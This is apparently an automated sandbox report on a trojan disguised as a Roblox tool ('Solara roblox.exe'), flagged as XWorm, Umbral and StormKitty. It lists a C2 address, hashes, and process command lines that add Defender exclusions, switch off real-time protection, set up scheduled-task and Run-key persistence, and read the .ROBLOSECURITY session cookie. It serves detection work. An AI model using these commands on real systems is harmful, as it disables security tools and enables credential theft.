Analysis
-
max time kernel
133s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
arch:x64, arch:x86, image:win11-20240704-en, locale:en-us, os:windows11-21h2-x64, system -
submitted
09-07-2024 11:26
Behavioral task
behavioral1
Sample
Solara roblox.exe
Resource
win11-20240704-en
General
-
Target
Solara roblox.exe
-
Size
102KB
-
MD5
ce28d82fa8e4dbbd72cae1bf8d4930e1
-
SHA1
0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
-
SHA256
d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
-
SHA512
ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
SSDEEP
3072:Eb1Z3z4aicVw+NUbUq5dikO3WGWlxUJ1lbE812:Eb1ldC+UbUSdiIdnUJfEm
Malware Config
Extracted
xworm
127.0.0.1:62559
19.ip.gl.ply.gg:62559
-
Install_directory
%AppData%
-
install_file
svchost.exe
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
- resource: C:\Users\Admin\AppData\Local\Temp\nzelay.exe, yara_rule: family_umbral
- resource: behavioral1/memory/3092-70-0x000001EE4F670000-0x000001EE4F6B6000-memory.dmp, yara_rule: family_umbral
-
Detect Xworm Payload 2 IoCs
Processes:
- resource: behavioral1/memory/3832-1-0x0000000000620000-0x0000000000640000-memory.dmp, yara_rule: family_xworm
- resource: C:\Users\Admin\AppData\Roaming\svchost.exe, yara_rule: family_xworm
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
- resource: behavioral1/memory/3832-150-0x000000001CB60000-0x000000001CC80000-memory.dmp, yara_rule: family_stormkitty
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
- pid 3280 powershell.exe
- pid 4836 powershell.exe
- pid 4516 powershell.exe
- pid 900 powershell.exe
- pid 3816 powershell.exe
-
Drops file in Drivers directory 1 IoCs
Processes:
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (process: nzelay.exe)
-
Drops startup file 2 IoCs
Processes:
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk (process: Solara roblox.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk (process: Solara roblox.exe)
-
Executes dropped EXE 3 IoCs
Processes:
- pid 2396 svchost.exe
- pid 3092 nzelay.exe
- pid 1840 svchost.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- Set value (str): \REGISTRY\USER\S-1-5-21-3590242114-4229536887-1276274119-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" (process: Solara roblox.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 1: ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
- pid 900 powershell.exe
- pid 900 powershell.exe
- pid 3816 powershell.exe
- pid 3816 powershell.exe
- pid 3280 powershell.exe
- pid 3280 powershell.exe
- pid 4836 powershell.exe
- pid 4836 powershell.exe
- pid 3832 Solara roblox.exe
- pid 3092 nzelay.exe
- pid 4516 powershell.exe
- pid 4516 powershell.exe
- pid 4180 powershell.exe
- pid 4180 powershell.exe
- pid 1048 powershell.exe
- pid 1048 powershell.exe
- pid 1160 powershell.exe
- pid 1160 powershell.exe
- pid 3680 powershell.exe
- pid 3680 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- Token: SeDebugPrivilege (pid 3832, Solara roblox.exe)
- Token: SeDebugPrivilege (pid 900, powershell.exe)
- Token: SeDebugPrivilege (pid 3816, powershell.exe)
- Token: SeDebugPrivilege (pid 3280, powershell.exe)
- Token: SeDebugPrivilege (pid 4836, powershell.exe)
- Token: SeDebugPrivilege (pid 3832, Solara roblox.exe)
- Token: SeDebugPrivilege (pid 2396, svchost.exe)
- Token: SeDebugPrivilege (pid 3092, nzelay.exe)
- Token: SeIncreaseQuotaPrivilege (pid 1628, wmic.exe)
- Token: SeSecurityPrivilege (pid 1628, wmic.exe)
- Token: SeTakeOwnershipPrivilege (pid 1628, wmic.exe)
- Token: SeLoadDriverPrivilege (pid 1628, wmic.exe)
- Token: SeSystemProfilePrivilege (pid 1628, wmic.exe)
- Token: SeSystemtimePrivilege (pid 1628, wmic.exe)
- Token: SeProfSingleProcessPrivilege (pid 1628, wmic.exe)
- Token: SeIncBasePriorityPrivilege (pid 1628, wmic.exe)
- Token: SeCreatePagefilePrivilege (pid 1628, wmic.exe)
- Token: SeBackupPrivilege (pid 1628, wmic.exe)
- Token: SeRestorePrivilege (pid 1628, wmic.exe)
- Token: SeShutdownPrivilege (pid 1628, wmic.exe)
- Token: SeDebugPrivilege (pid 1628, wmic.exe)
- Token: SeSystemEnvironmentPrivilege (pid 1628, wmic.exe)
- Token: SeRemoteShutdownPrivilege (pid 1628, wmic.exe)
- Token: SeUndockPrivilege (pid 1628, wmic.exe)
- Token: SeManageVolumePrivilege (pid 1628, wmic.exe)
- Token: 33 (pid 1628, wmic.exe)
- Token: 34 (pid 1628, wmic.exe)
- Token: 35 (pid 1628, wmic.exe)
- Token: 36 (pid 1628, wmic.exe)
- Token: SeIncreaseQuotaPrivilege (pid 1628, wmic.exe)
- Token: SeSecurityPrivilege (pid 1628, wmic.exe)
- Token: SeTakeOwnershipPrivilege (pid 1628, wmic.exe)
- Token: SeLoadDriverPrivilege (pid 1628, wmic.exe)
- Token: SeSystemProfilePrivilege (pid 1628, wmic.exe)
- Token: SeSystemtimePrivilege (pid 1628, wmic.exe)
- Token: SeProfSingleProcessPrivilege (pid 1628, wmic.exe)
- Token: SeIncBasePriorityPrivilege (pid 1628, wmic.exe)
- Token: SeCreatePagefilePrivilege (pid 1628, wmic.exe)
- Token: SeBackupPrivilege (pid 1628, wmic.exe)
- Token: SeRestorePrivilege (pid 1628, wmic.exe)
- Token: SeShutdownPrivilege (pid 1628, wmic.exe)
- Token: SeDebugPrivilege (pid 1628, wmic.exe)
- Token: SeSystemEnvironmentPrivilege (pid 1628, wmic.exe)
- Token: SeRemoteShutdownPrivilege (pid 1628, wmic.exe)
- Token: SeUndockPrivilege (pid 1628, wmic.exe)
- Token: SeManageVolumePrivilege (pid 1628, wmic.exe)
- Token: 33 (pid 1628, wmic.exe)
- Token: 34 (pid 1628, wmic.exe)
- Token: 35 (pid 1628, wmic.exe)
- Token: 36 (pid 1628, wmic.exe)
- Token: SeDebugPrivilege (pid 4516, powershell.exe)
- Token: SeDebugPrivilege (pid 4180, powershell.exe)
- Token: SeDebugPrivilege (pid 1048, powershell.exe)
- Token: SeDebugPrivilege (pid 1160, powershell.exe)
- Token: SeIncreaseQuotaPrivilege (pid 4324, wmic.exe)
- Token: SeSecurityPrivilege (pid 4324, wmic.exe)
- Token: SeTakeOwnershipPrivilege (pid 4324, wmic.exe)
- Token: SeLoadDriverPrivilege (pid 4324, wmic.exe)
- Token: SeSystemProfilePrivilege (pid 4324, wmic.exe)
- Token: SeSystemtimePrivilege (pid 4324, wmic.exe)
- Token: SeProfSingleProcessPrivilege (pid 4324, wmic.exe)
- Token: SeIncBasePriorityPrivilege (pid 4324, wmic.exe)
- Token: SeCreatePagefilePrivilege (pid 4324, wmic.exe)
- Token: SeBackupPrivilege (pid 4324, wmic.exe)
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- pid 3832 Solara roblox.exe
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
- PID 3832 (Solara roblox.exe) wrote to memory of 900 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 900 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3816 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3816 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3280 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3280 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 4836 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 4836 (powershell.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3112 (schtasks.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3112 (schtasks.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3092 (nzelay.exe)
- PID 3832 (Solara roblox.exe) wrote to memory of 3092 (nzelay.exe)
- PID 3092 (nzelay.exe) wrote to memory of 1628 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 1628 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4472 (attrib.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4472 (attrib.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4516 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4516 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4180 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4180 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 1048 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 1048 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 1160 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 1160 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4324 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4324 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4840 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4840 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 2504 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 2504 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 3680 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 3680 (powershell.exe)
- PID 3092 (nzelay.exe) wrote to memory of 2456 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 2456 (wmic.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4152 (cmd.exe)
- PID 3092 (nzelay.exe) wrote to memory of 4152 (cmd.exe)
- PID 4152 (cmd.exe) wrote to memory of 4784 (PING.EXE)
- PID 4152 (cmd.exe) wrote to memory of 4784 (PING.EXE)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
Depth 1: C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
  Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
  Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara roblox.exe'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
  Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
  Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
  Depth 2: C:\Windows\System32\schtasks.exe
  Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
  - Scheduled Task/Job: Scheduled Task
-
  Depth 2: C:\Users\Admin\AppData\Local\Temp\nzelay.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\nzelay.exe"
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
-
    Depth 3: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" csproduct get uuid
    - Suspicious use of AdjustPrivilegeToken
-
    Depth 3: C:\Windows\SYSTEM32\attrib.exe
    Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\nzelay.exe"
    - Views/modifies file attributes
-
    Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nzelay.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
    Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
    Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
    Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
    Depth 3: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" os get Caption
    - Suspicious use of AdjustPrivilegeToken
-
    Depth 3: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" computersystem get totalphysicalmemory
-
    Depth 3: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" csproduct get uuid
-
    Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    - Suspicious behavior: EnumeratesProcesses
-
    Depth 3: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic" path win32_VideoController get name
    - Detects videocard installed
-
    Depth 3: C:\Windows\SYSTEM32\cmd.exe
    Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\nzelay.exe" && pause
    - Suspicious use of WriteProcessMemory
-
      Depth 4: C:\Windows\system32\PING.EXE
      Command line: ping localhost
      - Runs ping.exe
-
Depth 1: C:\Users\Admin\AppData\Roaming\svchost.exe
Command line: C:\Users\Admin\AppData\Roaming\svchost.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
Depth 1: C:\Users\Admin\AppData\Roaming\svchost.exe
Command line: C:\Users\Admin\AppData\Roaming\svchost.exe
- Executes dropped EXE
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB
MD5
627073ee3ca9676911bee35548eff2b8
SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
Filesize
654B
MD5
2cbbb74b7da1f720b48ed31085cbd5b8
SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B
MD5
6490e5c0581c173062323b1c20cfd9ff
SHA1
1652893659f99b780fd9733243637eb7795f5212
SHA256
a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79
SHA512
fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5
0ac871344dc49ae49f13f0f88acb4868
SHA1
5a073862375c7e79255bb0eab32c635b57a77f98
SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
MD5
2bb0538fcc1cbfca1c374b8c092adfcd
SHA1
11d04e1bb8c5bf2bcf295ce3f4fea2ba41e45ba0
SHA256
c4b7f436c24728ef7f02b2f071aa880287a8f102a5047fbecfd024f87ef5c67d
SHA512
38cc6d129be4429c3b5d173cde524306a981fd4ec75896725e02367fc2777edba711dce1e4331b4d27ee9fa6f80c58530f175e9246a7608230ba8940aa010841
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B
MD5
e3840d9bcedfe7017e49ee5d05bd1c46
SHA1
272620fb2605bd196df471d62db4b2d280a363c6
SHA256
3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f
SHA512
76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B
MD5
9d17e8585400bc639a8b261083920ec3
SHA1
aef71cce477bd67115a4e2a0a86e6b8f0f62e30a
SHA256
81fa386fa9b3d185839bec826c3f8cc422e1f329792b901d61be826d42a57fc1
SHA512
235c6644c1349c77f2805c400fd1091a8775b7e63a2ba2e360418faaeb8b696da13ea7bb33a2d92b35f3fafd30fa6945c2398fba7bba39cf5f037a7d900878d5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B
MD5
8cb7f4b4ab204cacd1af6b29c2a2042c
SHA1
244540c38e33eac05826d54282a0bfa60340d6a1
SHA256
4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6
SHA512
7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B
MD5
9deb31d63c251368f1dcf297650b2997
SHA1
02a6835b82971ae7dba9d97e528412fac5247714
SHA256
9c598fb1420e5646126e8f7a42a3ea94b1050017e9cb67bbe6429f08c1bc2893
SHA512
0d6c8958a051b75f0d0a53e336954e102e642ad79a96f39fb1ed6643d77f9b54725b27eef460e33c89ff1d6136155cb6d873c25f9ae3dfc4a9d3a9346816477a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t10kuwlq.jpa.ps1
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nzelay.exe
Filesize
253KB
MD5
9f3f506175ad4d9550bf1aea609694a7
SHA1
6cc35e30d5b40eb1b5d115feec12ec247a84193f
SHA256
7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467
SHA512
b4a691e3b679dac187f1219cff013d3e27a87d55bf10c4744b8aba969a0caac39922dbbf9bce454b87e3e685f5bfa9043ecabacca090650278ab2d081bc2d5cb
-
C:\Users\Admin\AppData\Roaming\svchost.exe
Filesize
102KB
MD5
ce28d82fa8e4dbbd72cae1bf8d4930e1
SHA1
0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
SHA256
d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
SHA512
ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
memory/900-14-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/900-13-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/900-16-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/900-19-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/900-15-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/900-8-0x000002ACEEDA0000-0x000002ACEEDC2000-memory.dmp
Filesize
136KB
-
memory/900-12-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/3092-130-0x000001EE69F50000-0x000001EE69F62000-memory.dmp
Filesize
72KB
-
memory/3092-93-0x000001EE69E60000-0x000001EE69ED6000-memory.dmp
Filesize
472KB
-
memory/3092-94-0x000001EE69EE0000-0x000001EE69F30000-memory.dmp
Filesize
320KB
-
memory/3092-95-0x000001EE69E40000-0x000001EE69E5E000-memory.dmp
Filesize
120KB
-
memory/3092-70-0x000001EE4F670000-0x000001EE4F6B6000-memory.dmp
Filesize
280KB
-
memory/3092-129-0x000001EE69E30000-0x000001EE69E3A000-memory.dmp
Filesize
40KB
-
memory/3832-0-0x00007FF811983000-0x00007FF811985000-memory.dmp
Filesize
8KB
-
memory/3832-55-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/3832-2-0x00007FF811980000-0x00007FF812442000-memory.dmp
Filesize
10.8MB
-
memory/3832-1-0x0000000000620000-0x0000000000640000-memory.dmp
Filesize
128KB
-
memory/3832-150-0x000000001CB60000-0x000000001CC80000-memory.dmp
Filesize
1.1MB